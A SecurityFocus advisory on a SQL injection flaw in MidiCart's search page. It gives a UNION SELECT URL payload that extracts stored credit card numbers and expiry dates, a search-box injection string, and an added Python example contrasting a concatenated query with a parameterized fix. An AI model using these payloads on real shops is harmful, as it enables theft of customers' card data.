
MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability

The following example was provided:

http://[victim]/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*

The issue can also be reproduced by submitting the following string into the search box:

1' union select * from products'
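
SQL injection of this kind arises when the searchstring value is concatenated into the SQL text of the search query. The following is an added illustration, not MidiCart's code and not part of the original advisory: a Python/sqlite3 stand-in that runs the same search once with concatenation and once with a bound parameter. The products columns, the sample rows and the function names are constructed assumptions, and the page's UNION string is shortened to three columns to fit the constructed table.

```python
import sqlite3

def make_db():
    # Constructed stand-in data. card_payment, CreditCard and ExpDate are the
    # names used in the page's example; everything else is assumed.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        CREATE TABLE card_payment (CreditCard TEXT, ExpDate TEXT);
        INSERT INTO products VALUES (1, 'piano', '900'), (2, 'drum', '300');
        INSERT INTO card_payment VALUES ('0000-TEST-CARD', '01/00');
    """)
    return db

def search_concatenated(db, searchstring):
    # Vulnerable pattern: the input becomes part of the SQL text, so a quote
    # in searchstring ends the LIKE literal and the rest is parsed as SQL.
    sql = ("SELECT id, name, price FROM products "
           "WHERE name LIKE '%" + searchstring + "%'")
    return db.execute(sql).fetchall()

def search_parameterized(db, searchstring):
    # Hardened pattern: the input is bound as data and is only ever compared
    # against products.name, whatever characters it contains.
    sql = ("SELECT id, name, price FROM products "
           "WHERE name LIKE '%' || ? || '%'")
    return db.execute(sql, (searchstring,)).fetchall()

def leaks_card_data(rows):
    # True if any returned row carries the constructed card_payment value.
    return any("0000-TEST-CARD" in row for row in rows)

# The page's UNION string, reduced to the three columns of the stand-in table.
PAGE_STYLE_INPUT = ("a%' UNION SELECT null, CreditCard, ExpDate "
                    "FROM card_payment /*")

if __name__ == "__main__":
    db = make_db()
    for search in (search_concatenated, search_parameterized):
        rows = search(db, PAGE_STYLE_INPUT)
        print(search.__name__, "leaks card data:", leaks_card_data(rows))
```

With the bound parameter the whole input is matched as a literal product name, so the search returns no rows instead of the contents of card_payment.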

Copyright 2009, SecurityFocus